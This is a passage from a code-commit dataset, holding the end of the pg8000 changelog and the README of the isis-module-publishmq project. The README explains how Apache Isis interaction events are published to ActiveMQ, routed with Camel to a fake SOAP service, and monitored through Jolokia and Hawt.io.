the performance tests about 5%.\n * Simplify the event loop. Now the main event loop just continues until a\n READY_FOR_QUERY message is received. This follows the suggestion in the\n Postgres protocol docs. There's not much of a difference in speed, but the\n code is a bit simpler, and it should make things more robust.\n * Re-arrange the code as a state machine to give > 30% speedup.\n * Using pre-compiled struct objects. Pre-compiled struct objects are a bit\n faster than using the struct functions directly. It also hopefully adds to\n the readability of the code.\n * Speeded up _send. Before calling the socket 'write' method, we were\n checking that the 'data' type implements the 'buffer' interface (bytes or\n bytearray), but the check isn't needed because 'write' raises an exception\n if data is of the wrong type.\n\n\n* Add facility for turning auto-commit on. This follows the suggestion of\n funkybob to fix the problem of not be able to execute a command such as\n 'create database' that must be executed outside a transaction. Now you can do\n conn.autocommit = True and then execute 'create database'.\n\n* Add support for the PostgreSQL ``uid`` type. Thanks to Rad Cirskis.\n\n* Add support for the PostgreSQL XML type.\n\n* Add support for the PostgreSQL ``enum`` user defined types.\n\n* Fix a socket leak, where a problem opening a connection could leave a socket\n open.\n\n* Fix empty array issue. https:\/\/github.com\/mfenniak\/pg8000\/issues\/10\n\n* Fix scale on ``numeric`` types. https:\/\/github.com\/mfenniak\/pg8000\/pull\/13\n\n* Fix numeric_send. Thanks to Christian Hofstaedtler.\n\n\n=== Version 1.08, 2010-06-08\n\n* Removed usage of deprecated :mod:`md5` module, replaced with :mod:`hashlib`.\n Thanks to Gavin Sherry for the patch.\n\n* Start transactions on execute or executemany, rather than immediately at the\n end of previous transaction. Thanks to Ben Moran for the patch.\n\n* Add encoding lookups where needed, to address usage of SQL_ASCII encoding.\n Thanks to Benjamin Schweizer for the patch.\n\n* Remove record type cache SQL query on every new pg8000 connection.\n\n* Fix and test SSL connections.\n\n* Handle out-of-band messages during authentication.\n\n\n=== Version 1.07, 2009-01-06\n\n* Added support for :meth:`~pg8000.dbapi.CursorWrapper.copy_to` and\n :meth:`~pg8000.dbapi.CursorWrapper.copy_from` methods on cursor objects, to\n allow the usage of the PostgreSQL COPY queries. Thanks to Bob Ippolito for\n the original patch.\n\n* Added the :attr:`~pg8000.dbapi.ConnectionWrapper.notifies` and\n :attr:`~pg8000.dbapi.ConnectionWrapper.notifies_lock` attributes to DBAPI\n connection objects to provide access to server-side event notifications.\n Thanks again to Bob Ippolito for the original patch.\n\n* Improved performance using buffered socket I\/O.\n\n* Added valid range checks for :class:`~pg8000.types.Interval` attributes.\n\n* Added binary transmission of :class:`~decimal.Decimal` values. This permits\n full support for NUMERIC[] types, both send and receive.\n\n* New `Sphinx <http:\/\/sphinx.pocoo.org\/>`_-based website and documentation.\n\n\n=== Version 1.06, 2008-12-09\n\n* pg8000-py3: a branch of pg8000 fully supporting Python 3.0.\n\n* New Sphinx-based documentation.\n\n* Support for PostgreSQL array types -- INT2[], INT4[], INT8[], FLOAT[],\n DOUBLE[], BOOL[], and TEXT[]. New support permits both sending and\n receiving these values.\n\n* Limited support for receiving RECORD types. If a record type is received,\n it will be translated into a Python dict object.\n\n* Fixed potential threading bug where the socket lock could be lost during\n error handling.\n\n\n=== Version 1.05, 2008-09-03\n\n* Proper support for timestamptz field type:\n\n * Reading a timestamptz field results in a datetime.datetime instance that\n has a valid tzinfo property. tzinfo is always UTC.\n\n * Sending a datetime.datetime instance with a tzinfo value will be\n sent as a timestamptz type, with the appropriate tz conversions done.\n\n* Map postgres < -- > python text encodings correctly.\n\n* Fix bug where underscores were not permitted in pyformat names.\n\n* Support \"%s\" in a pyformat strin.\n\n* Add cursor.connection DB-API extension.\n\n* Add cursor.next and cursor.__iter__ DB-API extensions.\n\n* DBAPI documentation improvements.\n\n* Don't attempt rollback in cursor.execute if a ConnectionClosedError occurs.\n\n* Add warning for accessing exceptions as attributes on the connection object,\n as per DB-API spec.\n\n* Fix up open connection when an unexpected connection occurs, rather than\n leaving the connection in an unusable state.\n\n* Use setuptools\/egg package format.\n\n\n=== Version 1.04, 2008-05-12\n\n* DBAPI 2.0 compatibility:\n\n * rowcount returns rows affected when appropriate (eg. UPDATE, DELETE)\n\n * Fix CursorWrapper.description to return a 7 element tuple, as per spec.\n\n * Fix CursorWrapper.rowcount when using executemany.\n\n * Fix CursorWrapper.fetchmany to return an empty sequence when no more\n results are available.\n\n * Add access to DBAPI exceptions through connection properties.\n\n * Raise exception on closing a closed connection.\n\n * Change DBAPI.STRING to varchar type.\n\n * rowcount returns -1 when appropriate.\n\n * DBAPI implementation now passes Stuart Bishop's Python DB API 2.0 Anal\n Compliance Unit Test.\n\n* Make interface.Cursor class use unnamed prepared statement that binds to\n parameter value types. This change increases the accuracy of PG's query\n plans by including parameter information, hence increasing performance in\n some scenarios.\n\n* Raise exception when reading from a cursor without a result set.\n\n* Fix bug where a parse error may have rendered a connection unusable.\n\n\n=== Version 1.03, 2008-05-09\n\n* Separate pg8000.py into multiple python modules within the pg8000 package.\n There should be no need for a client to change how pg8000 is imported.\n\n* Fix bug in row_description property when query has not been completed.\n\n* Fix bug in fetchmany dbapi method that did not properly deal with the end of\n result sets.\n\n* Add close methods to DB connections.\n\n* Add callback event handlers for server notices, notifications, and runtime\n configuration changes.\n\n* Add boolean type output.\n\n* Add date, time, and timestamp types in\/out.\n\n* Add recognition of \"SQL_ASCII\" client encoding, which maps to Python's\n \"ascii\" encoding.\n\n* Add types.Interval class to represent PostgreSQL's interval data type, and\n appropriate wire send\/receive methods.\n\n* Remove unused type conversion methods.\n\n\n=== Version 1.02, 2007-03-13\n\n* Add complete DB-API 2.0 interface.\n\n* Add basic SSL support via ssl connect bool.\n\n* Rewrite pg8000_test.py to use Python's unittest library.\n\n* Add bytea type support.\n\n* Add support for parameter output types: NULL value, timestamp value, python\n long value.\n\n* Add support for input parameter type oid.\n\n\n=== Version 1.01, 2007-03-09\n\n* Add support for writing floats and decimal objs up to PG backend.\n\n* Add new error handling code and tests to make sure connection can recover\n from a database error.\n\n* Fixed bug where timestamp types were not always returned in the same binary\n format from the PG backend. Text format is now being used to send\n timestamps.\n\n* Fixed bug where large packets from the server were not being read fully, due\n to socket.read not always returning full read size requested. It was a\n lazy-coding bug.\n\n* Added locks to make most of the library thread-safe.\n\n* Added UNIX socket support.\n\n\n=== Version 1.00, 2007-03-08\n\n* First public release. Although fully functional, this release is mostly\n lacking in production testing and in type support.\n","returncode":0,"stderr":"","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"c26286873e0116d34216c881b9223aa7041b07b5","subject":"Further updates to README, aim -> ixn","message":"Further updates to README, aim -> ixn\n","repos":"isisaddons\/isis-module-publishmq,isisaddons\/isis-module-publishmq,isisaddons\/isis-module-publishmq,isisaddons\/isis-module-publishmq","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= isis-module-publishmq\n:_imagesdir: .\/\n\nimage:https:\/\/travis-ci.org\/isisaddons\/isis-module-publishmq.png?branch=master[Build Status,link=https:\/\/travis-ci.org\/isisaddons\/isis-module-publishmq]\n\nThis module, intended for use with http:\/\/isis.apache.org[Apache Isis], provides an implementation of Apache Isis` link:http:\/\/isis.apache.org\/guides\/rg.html#_rg_services-spi_manpage-PublishingService[`PublishingService`] SPI that submits an XML representation of an link:https:\/\/github.com\/apache\/isis\/blob\/master\/core\/schema\/src\/main\/resources\/org\/apache\/isis\/schema\/ixn\/ixn.xsd[`MemberInteractionDto`]s to an link:http:\/\/activemq.apache.org[ActiveMQ] queue.\n\nThe example app itself also demonstrates how this member interaction event (action invocation or property edit) can\nbe routed using link:http:\/\/camel.apache.org[Apache Camel]:\n\n* the payload is enriched using Apache Isis' own link:http:\/\/isis.apache.org\/guides\/ug.html#_ug_restfulobjects-viewer[Restful Objects] viewer (obtaining additional information).\n* the enriched message is used to post to a (fake) external SOAP, eg representing a General Ledger.\n\nIn addition, the example app configures link:https:\/\/jolokia.org\/[Jolokia], allowing the ActiveMQ, Camel and other JMX beans to be administered from an external console such as link:hawt.io[Hawt.io].\n\nThe diagram below shows the moving parts:\n\nimage::webapp\/src\/main\/webapp\/images\/overview.png[link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/webapp\/src\/main\/webapp\/images\/overview.png\"]\n\n\nOne of the design objectives for the PublishMq module is to allow the ActiveMQ queue (and therefore any Camel routing) to be either embedded (as in the example app) or to be remote. This is one of the reasons why the payload posted to the queue is the XML representation of a JAXB object (the `InvocationDto`).\n\nTo make the example app easier to run, the fake SOAP service representing the external system is actually deployed as a CXF servlet within the example app itself, mounted at `\/soap\/ExternalSystemAdapter\/DemoObject`. It exposes an API for the Camel routing to post to, and also exposes a query API that simply lists the messages received. Of course, \"in real life\" this external system would be running somewhere else on the network (as the diagram shows).\n\n\n\n\n== Application walk-through\n\nThe following screenshots show how the publishing service publishes the member interaction events that are then routed\nthrough to the (fake) external system using Camel.\n\n=== Installing the Fixture Data\n\nFirst, install sample data:\n\nimage::images\/010-install-fixtures.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/010-install-fixtures.png\"]\n\nThis returns the first demo object (an instance of `PublishMqDemoObject`):\n\nimage::images\/020-update-demo-object.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/020-update-demo-object.png\"]\n\n=== Invoke an action\n\nThe `updateName()` action is defined as:\n\n[source,java]\n----\n@Action(\n semantics = SemanticsOf.IDEMPOTENT,\n publishing = Publishing.ENABLED \/\/ <1>\n)\npublic PublishMqDemoObject updateName(\n @ParameterLayout(named=\"Name\") final String name) {\n setName(name);\n return this;\n}\n----\n<1> invocations of this action will be published to the configured implementation of `PublishingService`.\n\n\nInvoke the action:\n\nimage::images\/030-update-demo-object.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/030-update-demo-object.png\"]\n\nthe value of the `name` property should, of course, be updated:\n\nimage::images\/040-demo-object-updated.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/040-demo-object-updated.png\"]\n\n\n=== Camel routing\n\nThe example app defines the following Camel route (link:fixture\/routing\/src\/main\/resources\/camel-config.xml[camel-config.xml]):\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route id=\"updateFakeSoapServiceRoute\">\n <from uri=\"activemq-broker:queue:memberInteractionsQueue\"\/> <!-- 1 -->\n <unmarshal>\n <jaxb contextPath=\"org.apache.isis.schema.ixn.v1\" prettyPrint=\"true\"\/> <!-- 2 -->\n <\/unmarshal>\n <camel:process ref=\"addExchangeHeaders\"\/> <!-- 3 -->\n <camel:choice>\n <camel:when> <!-- 4 -->\n <camel:simple> <!-- 5 -->\n ${header.ixn[execution$memberIdentifier]} ==\n 'org.isisaddons.module.publishmq.fixture.dom.PublishMqDemoObject#updateName()'\n <\/camel:simple>\n <log message=\"updateName() received... \"\/>\n <camel:process ref=\"attachDomCanonicalDtoUsingRestfulObjects\"\/> <!-- 6 -->\n <camel:process ref=\"postToFakeExternalSoapService\"\/> <!-- 7 -->\n <log message=\"internalId: ${header.externalSystemInternalId}\"\/> <!-- 8 -->\n <camel:to uri=\"stream:out\"\/> <!-- 9 -->\n <\/camel:when>\n <camel:when>\n ...\n <\/camel:when>\n <\/camel:choice>\n <\/route>\n<\/camelContext>\n----\n<1> subscribe to ActiveMQ for incoming member interaction events (in XML form). This uses the internal `vm:\/\/` protocol for speed\n<2> unmarshal to a (JAXB annotated) `InteractionDto` object\n<3> using the `AddExchangeHeaders` component provided by this module to add the metadata from the `InteractionDto` to the Camel message. This allows the message to be routed\n<4> use Camel to select which sub-route to following, using...\n<5> ... the header attached earlier. The action identifier header is usually used as the predicate for selecting the sub-route\n<6> Use a processor (implemented in the example app) to attach a DTO obtained from a call to Restful Objects.\n<7> Use a processor (implemented in the example app) to post a message to the fake external SOAP service.\n<8> Log the id allocated by the fake server to the console. This will increment for each call\n<9> Log the message payload to the console. Note that this does not include any attachments\n\nThe referenced beans are defined as:\n\n[source,xml]\n----\n<bean id=\"activemq-broker\"\n class=\"org.apache.activemq.camel.component.ActiveMQComponent\">\n <property name=\"brokerURL\" value=\"vm:\/\/broker?create=false&waitForStart=5000\"\/>\n<\/bean>\n<bean id=\"addExchangeHeaders\"\n class=\"org.isisaddons.module.publishmq.dom.camel.AddExchangeHeaders\"\/> <!--1-->\n<bean id=\"attachDomCanonicalDtoUsingRestfulObjects\"\n class=\"org.isisaddons.module.publishmq.fixture.routing.AttachDemoObjectDto\"\n init-method=\"init\"> <!--2-->\n <property name=\"base\" value=\"${attachDomCanonicalDto.base}\"\/>\n <property name=\"username\" value=\"${attachDomCanonicalDto.username}\"\/>\n <property name=\"password\" value=\"${attachDomCanonicalDto.password}\"\/>\n<\/bean>\n<bean id=\"postToFakeExternalSoapService\"\n class=\"org.isisaddons.module.publishmq.fixture.routing.PostToExternalWebServiceUsingSoap\"\n init-method=\"init\"> <!--3-->\n <property name=\"endpointAddressBase\"\n value=\"${updateExternalSystemAdapter.endpointAddressBase}\"\/>\n <property name=\"endpointAddressSuffix\"\n value=\"${updateExternalSystemAdapter.endpointAddressSuffix}\"\/>\n<\/bean>\n----\n<1> adds the exchange headers for routing (step 3 in the route, above)\n<2> calls Restful Objects to obtain a DTO representing the updated entity (step 6 in the route)\n<3> calls fake SOAP service (step 7 in the route)\n\nThere are two observable side-effects from the execution of this route. Firstly, when the fake SOAP service is\ncalled, it should return an internal Id. This, along with the rest of the message payload, are logged to the console:\n\nimage::images\/050-camel-route-logging.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/050-camel-route-logging.png\"]\n\nThe screenshot also highlights the two important pieces of information used by the route: the member identifier metadata -- added as a Camel header for routing -- and the target object has was updated.\n\nSecond, we can query the fake SOAP service to se the data that was posted to it. The screenshot below uses link:http:\/\/www.soapui.org\/[SOAP UI], which can generate stub requests from the fake SOAP service's WSDL (http:\/\/localhost:8080\/soap\/ExternalSystemAdapter\/DemoObject?wsdl[http:\/\/localhost:8080\/soap\/ExternalSystemAdapter\/DemoObject?wsdl]):\n\nimage::images\/060-query-fake-server.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/060-query-fake-server.png\"]\n\n[WARNING]\n====\nThe above screenshot is out-of-date, showing the format of the `aim.xsd` for 1.12.x, rather than `ixn.xsd` for 1.13.x\n====\n\n\n=== Proxying the REST and SOAP calls\n\nTo see in a little more detail what the `attachDtoFromRestfulObjects` and `postToFakeExternalSoapService` processors actually do, we can use the venerable link:http:\/\/ws.apache.org\/tcpmon\/download.cgi[tcpmon] to act as a proxy. For example, we can set up port 6060 to forward onto port 8080:\n\nimage::images\/110-proxy-restful-objects.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/110-proxy-restful-objects.png\"]\n\nWe can similarly do the same for port 7070, also forwarding onto port 8080.\n\nThen, we can reconfigure the app to use these different ports by editing link:webapp\/src\/main\/resources\/spring.properties[`spring.properties`]:\n\n[source,ini]\n----\nattachDomCanonicalDto.base=http:\/\/localhost:6060\/restful\/\nupdateExternalSystemAdapter.endpointAddressBase=http:\/\/localhost:7070\/soap\/\n...\n----\n\nWhen we run once more, we can see that the `attachDtoFromRestfulObjects` processor uses conneg support to obtain a specific canonical DTO that represents the original `PublishedMqDemoObject` entity:\n\nimage::images\/120-conneg.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/120-conneg.png\"]\n\nUsing DTOs in this way is important because we want the Camel event bus logic to be decoupled from changes to the\ninternals of the Apache Isis app. As the screenshot shows, the processor specifies an HTTP Accept header. The\nRestful Objects viewer delegates to the configured\nlink:http:\/\/isis.apache.org\/guides\/rg.html#_rg_services-spi_manpage-ContentNegotiationService[`ContentNegotiationService`]\nSPI, which knows how to map the `PublishedMqDemoObject` entity into the requested `DemObjectDto` DTO:\n\n[source,java]\n----\n@DomainService(nature = NatureOfService.DOMAIN)\npublic class PublishMqDemoContentMappingService implements ContentMappingService {\n public Object map(\n final Object object,\n final List<MediaType> acceptableMediaTypes) {\n if(object instanceof PublishMqDemoObject) {\n final PublishMqDemoObject demoObject = (PublishMqDemoObject) object;\n final Bookmark bookmark = bookmarkService.bookmarkFor(object);\n final DemoObjectDto dto = new DemoObjectDto();\n dto.setName(demoObject.getName());\n dto.setDescription(demoObject.getDescription());\n final OidDto oidDto = bookmark.toOidDto();\n dto.setOid(oidDto);\n return dto;\n }\n return null;\n }\n @javax.inject.Inject\n private BookmarkService bookmarkService;\n}\n----\n\nThe call to the fake SOAP service meanwhile is more straightforward: we observe just the regular SOAP messages (the\nimplementation uses `wsdl2java` to create stubs, so the code is very straightforward):\n\nimage::images\/210-proxy-soapservice.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/210-proxy-soapservice.png\"]\n\n=== Jolokia and Hawt.io\n\nAs mentioned in the introduction, the example app also configures Jolokia so that consoles such as Hawt.io can be used to monitor\/administer internal JMX beans (including ActiveMQ and Camel).\n\nConfiguring Jolokia itself turns out to be as simple as updating the classpath and adding its servlet to the `web.xml`:\n\n[source,xml]\n----\n<servlet>\n <servlet-name>jolokia-agent<\/servlet-name>\n <servlet-class>org.jolokia.http.AgentServlet<\/servlet-class>\n <init-param>\n <param-name>discoveryEnabled<\/param-name>\n <param-value>false<\/param-value>\n <\/init-param>\n <init-param>\n <param-name>agentDescription<\/param-name>\n <param-value>Apache ActiveMQ<\/param-value>\n <\/init-param>\n <load-on-startup>1<\/load-on-startup>\n<\/servlet>\n<servlet-mapping>\n <servlet-name>jolokia-agent<\/servlet-name>\n <!-- using same convention as standalone ActiveMQ -->\n <url-pattern>\/api\/jolokia\/*<\/url-pattern>\n<\/servlet-mapping>\n----\n\nWith this done, we can use Hawt.io to connect to the service:\n\nimage::images\/310-connect-activemq.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/310-connect-activemq.png\"]\n\nHawt.io itself runs as a separate webapp. For testing purposes, it can also be run from the command line, eg:\n\n[source,bash]\n----\njava -jar hawtio-app-1.4.51.jar --port 9090\n----\n\n\n=== Monitoring ActiveMQ and Camel\n\nOnce connected we can navigate to the ActiveMQ tab:\n\nimage::images\/320-monitor-activemq.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/320-monitor-activemq.png\"]\n\nand similarly to the Camel tab:\n\nimage::images\/330-monitor-camel.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/330-monitor-camel.png\"]\n\n\n\n\n== How to run the Demo App\n\nThe prerequisite software is:\n\n* Java JDK 7 (nb: Isis currently does not support JDK 8)\n* http:\/\/maven.apache.org[maven 3] (3.2.x or later is recommended).\n\nTo build the demo app:\n\n[source]\n----\ngit clone https:\/\/github.com\/isisaddons\/isis-module-publishmq.git\nmvn clean install\n----\n\nTo run the demo app:\n\n[source]\n----\nmvn antrun:run -P self-host\n----\n\nThen log on using user: `sven`, password: `pass`\n\n\nIf you want to proxy the Restful Objects and\/or fake SOAP servers, then update `spring.properties` and run `tcpmon` or similar (as shown in the app walkthrough, above).\n\nHawt.io is a standalone utility that is _not_ integrated into the example webapp; if you want to run it then specify `--port` so that it runs on some other port than its default, 8080.\n\n\n\n\n\n== How to configure\/use\n\nYou can either use this module \"out-of-the-box\", or you can fork this repo and extend to your own requirements.\n\nThe module itself consists of submodules:\n\n* `dom-servicespi`, containing the `PublishingService` SPI implementation\n* `dom-camel`, that provides utility class to help route messages.\n* `dom`, parent module\n\n\n\n=== \"Out-of-the-box\"\n\nTo use \"out-of-the-box\":\n\n* update your classpath by adding importing the parent module's dependency into in your parent module's `pom.xml`: +\n+\n[source,xml]\n----\n<dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>${project.groupId}<\/groupId>\n <artifactId>isis-module-publishmq-dom<\/artifactId>\n <version>1.12.0<\/artifactId>\n <type>pom<\/type>\n <scope>import<\/scope>\n <\/dependency>\n ...\n <\/dependencies>\n<\/dependencyManagement>\n----\n\n* if using `AppManifest`, then update its `getModules()` method: +\n\n[source,xml]\n----\n @Override\n public List<Class<?>> getModules() {\n return Arrays.asList(\n ...\n org.isisaddons.module.publishmq.PublishMqModule.class,\n ...\n );\n }\n----\n\n* otherwise, in your project's `webapp` module, update your `WEB-INF\/isis.properties`. +\n+\n[source,xml]\n----\n isis.services.ServicesInstallerFromAnnotation.packagePrefix=\\\n ...\\\n org.isisaddons.module.publishmq.dom,\\\n ...\n----\n+\nYou might also need to specify the package for any new services that you have written, eg implementation of `ContentNegotiationService` or similar.\n\n* update your classpath by adding importing the `-dom-servicespi` dependency in your project's `dom` module's `pom.xml`: +\n+\n[source,xml]\n----\n<dependencies>\n <dependency>\n <groupId>org.isisaddons.module.publishmq<\/groupId>\n <artifactId>isis-module-publishmq-dom-servicespi<\/artifactId>\n <\/dependency>\n ...\n<\/dependencies>\n----\n\n* if you are using Camel for routing and want to use the `AddExchangeHeaders` utility class, then -- in the appropriate module within your app -- add the dependency: +\n+\n[source,xml]\n----\n<dependencies>\n <dependency>\n <groupId>org.isisaddons.module.publishmq<\/groupId>\n <artifactId>isis-module-publishmq-dom-camel<\/artifactId>\n <\/dependency>\n ...\n<\/dependencies>\n----\n+\nIn the example app all the Camel routing can be found in the `-fixture-routing` module.\n\n\n* configure ActiveMQ so that the publishing service implementation can post to a queue called `memberInteractionsQueue`. +\n+\nIn the example app this is done using Spring (link:webapp\/src\/main\/resources\/activemq-config.xml[activemq-config.xml]):\n+\n[source,xml]\n----\n<beans\n xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans http:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n http:\/\/activemq.apache.org\/schema\/core http:\/\/activemq.apache.org\/schema\/core\/activemq-core.xsd\">\n <broker xmlns=\"http:\/\/activemq.apache.org\/schema\/core\"\n brokerName=\"broker\"\n dataDirectory=\"${activemq.data}\"\n useShutdownHook=\"false\"\n useJmx=\"true\"\n >\n ...\n <destinations>\n <queue physicalName=\"memberInteractionsQueue\"\/>\n <\/destinations>\n ...\n <\/broker>\n<\/beans>\n----\n+\nThis is bootstrapped in the `web.xml`:\n+\n[source,xml]\n----\n<listener>\n <listener-class>org.springframework.web.context.ContextLoaderListener<\/listener-class>\n<\/listener>\n<context-param>\n <param-name>contextConfigLocation<\/param-name>\n <param-value>\n classpath:activemq-config.xml\n <\/param-value>\n<\/context-param>\n----\n\nNotes:\n\n* Check for later releases by searching http:\/\/search.maven.org\/#search|ga|1|isis-module-publishmq-dom[Maven Central Repo]).\n\n\n==== \"Out-of-the-box\" (-SNAPSHOT)\n\nIf you want to use the current `-SNAPSHOT`, then the steps are the same as above, except:\n\n* when updating the classpath, specify the appropriate -SNAPSHOT version:\n\n[source,xml]\n----\n<version>1.13.0-SNAPSHOT<\/version>\n----\n\n* add the repository definition to pick up the most recent snapshot (we use the Cloudbees continuous integration service). We suggest defining the repository in a `<profile>`:\n\n[source,xml]\n----\n<profile>\n <id>cloudbees-snapshots<\/id>\n <activation>\n <activeByDefault>true<\/activeByDefault>\n <\/activation>\n <repositories>\n <repository>\n <id>snapshots-repo<;\/id>\n <url>http:\/\/repository-estatio.forge.cloudbees.com\/snapshot\/<\/url>\n <releases>\n <enabled>false>\/enabled>\n <\/releases>\n <snapshots>\n <enabled>true<\/enabled>\n <\/snapshots>\n <\/repository>\n <\/repositories>\n<\/profile>\n----\n\n=== Forking the repo\n\nIf instead you want to extend this module's functionality, then we recommend that you fork this repo. The repo is\nstructured as follows:\n\n* `pom.xml` - parent pom\n* `dom` - the module implementation, itself a parent with submodules:\n** `dom-servicespi` - the implementation of `PublishingServiceUsingActiveMq`; depends on the Apache Isis applib\n** `dom-camel` - providing the `AddExchangeHeaders` utility for routing messages using Camel\n* `fixture` - fixtures, itself a parent with submodules:\n** `fixture-dom` - holding a sample domain objects; depends on `dom-servicespi`\n** `fixture-scripts` - holding sample fixture (data) setup scripts\n** `fixture-canonical` - defines the canonical `DemoObjectDto`, as queried for using Restful Objects. This uses `xjc` to convert the XSD into the Java DTO.\n** `fixture-canonicalmappings` - contains the implementation of `ContentMappingService` to map the `PublishMqDemoObject` entity to `DemoObjectDto` DTO\n** `fixture-routing` - contains the example Camel rout\n* `externalsystemadapter` - parent module for the fake external system exposing a SOAP web service:\n** `externalsystemadapter-wsdl` - defines the WSDL for the fake SOAP service\n** `externalsystemadapter-wsdlgen` - generates the stub classes for both client and server\n** `externalsystemadapter-fakeserver` - implementation of the fake server (embedded in the example webapp for convenience\/testing)\n* `integtests` - (TODO) integration tests for the module; depends on `fixture-dom`\n* `webapp` - demo webapp (see above screenshots); depends on `dom` and `fixture`\n\nOnly the `dom` module (with its submodules) is released to Maven Central Repo. The versions of the other modules are purposely left at `0.0.1-SNAPSHOT` because they are not intended to be released.\n\n\n\n== Also of note\n\nThe example app contains a few other little tricks that may be useful if you are looking to deploy a similar architecture for your own application.\n\n=== Generate Canonical DTO referencing Apache Isis' DTOs\n\nAs of 1.13.0 Apache Isis includes the link:http:\/\/isis.apache.org\/schema\/ixn\/ixn.xsd[`ixn.xsd`] (member interaction)\nschema (replacing and generalizing the `aim.xsd` provided from 1.9.0 through 1.12.x). The `PublishingServiceMq` uses\nthis `ixn.xsd` schema (or rather, its Java JAXB equivalent, `InteractionDto`), directly.\n\nThe similar `common.xsd` is _also_ used by the demo app in the construction of its own canonical `DemoObjectDto` (use of\n`OidDto` to represent a bookmark to a published domain object).\n\n\n=== Centralized Spring configuration\n\nIn the example app Spring is used to bootstrap ActiveMQ (link:webapp\/src\/main\/resources\/activemq-config.xml[`activemq-config.xml`]), and Camel (link:fixture\/routing\/src\/main\/resources\/camel-config.xml[`camel-config.xml`]), and also the fake SOAP Subscriber (link:webapp\/src\/main\/resources\/externalSystemFakeServer-config.xml[`externalSystemFakeServer-config.xml`]). The configuration for all is centralized through a propertyPlaceholderConfigurer bean (defined in link:webapp\/src\/main\/resources\/propertyPlaceholderConfigurer-config.xml#L23[`propertyPlaceholderConfigurer-config.xml`]).\n\nThe location of the property file is specified in the link:webapp\/src\/main\/webapp\/WEB-INF\/web.xml#L44[`web.xml`]:\n\n[source,xml]\n----\n<context-param>\n <param-name>spring.config.file<\/param-name>\n <param-value>classpath:spring.properties<\/param-value>\n<\/context-param>\n----\n\nwhere link:webapp\/src\/main\/resources\/spring.properties[`spring.properties`] is:\n\n[source,ini]\n----\nactivemq.data=activemq-data\nenrichWithCanonicalDto.base=http:\/\/localhost:8080\/restful\/\nenrichWithCanonicalDto.username=sven\nenrichWithCanonicalDto.password=pass\nupdateExternalSystemAdapter.endpointAddress=http:\/\/localhost:8080\/soap\/ExternalSystemAdapter\/DemoObject\n----\n\nIf necessary the location of this config file can be overridden; see link:http:\/\/isis.apache.org\/guides\/ug.html#_ug_deployment_externalized-configuration[this topic] in the Apache Isis user guide.\n\n\n=== WSDL to Java\n\nSimilar to the way in which the .xsd schemas are converted to Java, `wsdl2java` is used to convert the fake server's WSDL to Java stubs. This WSDL can be found link:externalsystemadapter\/wsdl\/src\/main\/resources\/org\/isisaddons\/module\/publishmq\/externalsystemadapter\/wsdl\/DemoObject.wsdl[here]; the `pom.xml` configuration can be found link:https:\/\/github.com\/isisaddons\/isis-module-publishmq\/blob\/master\/externalsystemadapter\/wsdlgen\/pom.xml#L76[here].\n\n\n\n\n\n== Related Modules\/Services\n\nThe http:\/\/github.com\/isisaddons\/isis-module-publishing[Isis addons' publishing] module provides an alternative implementation of `PublishingService` SPI that publishes to a database table.\n\n\n\n\n== Known issues\n\nNone at this time.\n\n\n\n== Change Log\n\n* `1.12.0` - released against Isis 1.12.0\n* `1.11.0` - released against Isis 1.11.0.\n* `1.10.0` - released against Isis 1.10.0\n* `1.9.0` - released against Isis 1.9.0\n\n\n\n== Legal Stuff\n\n=== License\n\n[source]\n----\nCopyright 2015 Dan Haywood\n\nLicensed under the Apache License, Version 2.0 (the\n\"License\"); you may not use this file except in compliance\nwith the License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing,\nsoftware distributed under the License is distributed on an\n\"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\nKIND, either express or implied. See the License for the\nspecific language governing permissions and limitations\nunder the License.\n----\n\n=== Dependencies\n\nThe module depends on link:http:\/\/activemq.apache.org[ActiveMQ] and also link:http:\/\/camel.apache.org[Camel]. The latter can be considered optional, because that dependency only provides a supporting utility class (`AddExchangeHeaders`).\n\n\n\n\n== Maven deploy notes\n\nOnly the `dom` module is deployed, and is done so using Sonatype's OSS support (see\nhttp:\/\/central.sonatype.org\/pages\/apache-maven.html[user guide]).\n\n=== Release to Sonatype's Snapshot Repo\n\nTo deploy a snapshot, use:\n\n[source]\n----\npushd dom\nmvn clean deploy\npopd\n----\n\nThe artifacts should be available in Sonatype's\nhttps:\/\/oss.sonatype.org\/content\/repositories\/snapshots[Snapshot Repo].\n\n\n\n=== Release to Maven Central\n\nThe `release.sh` script automates the release process. It performs the following:\n\n* performs a sanity check (`mvn clean install -o`) that everything builds ok\n* bumps the `pom.xml` to a specified release version, and tag\n* performs a double check (`mvn clean install -o`) that everything still builds ok\n* releases the code using `mvn clean deploy`\n* bumps the `pom.xml` to a specified 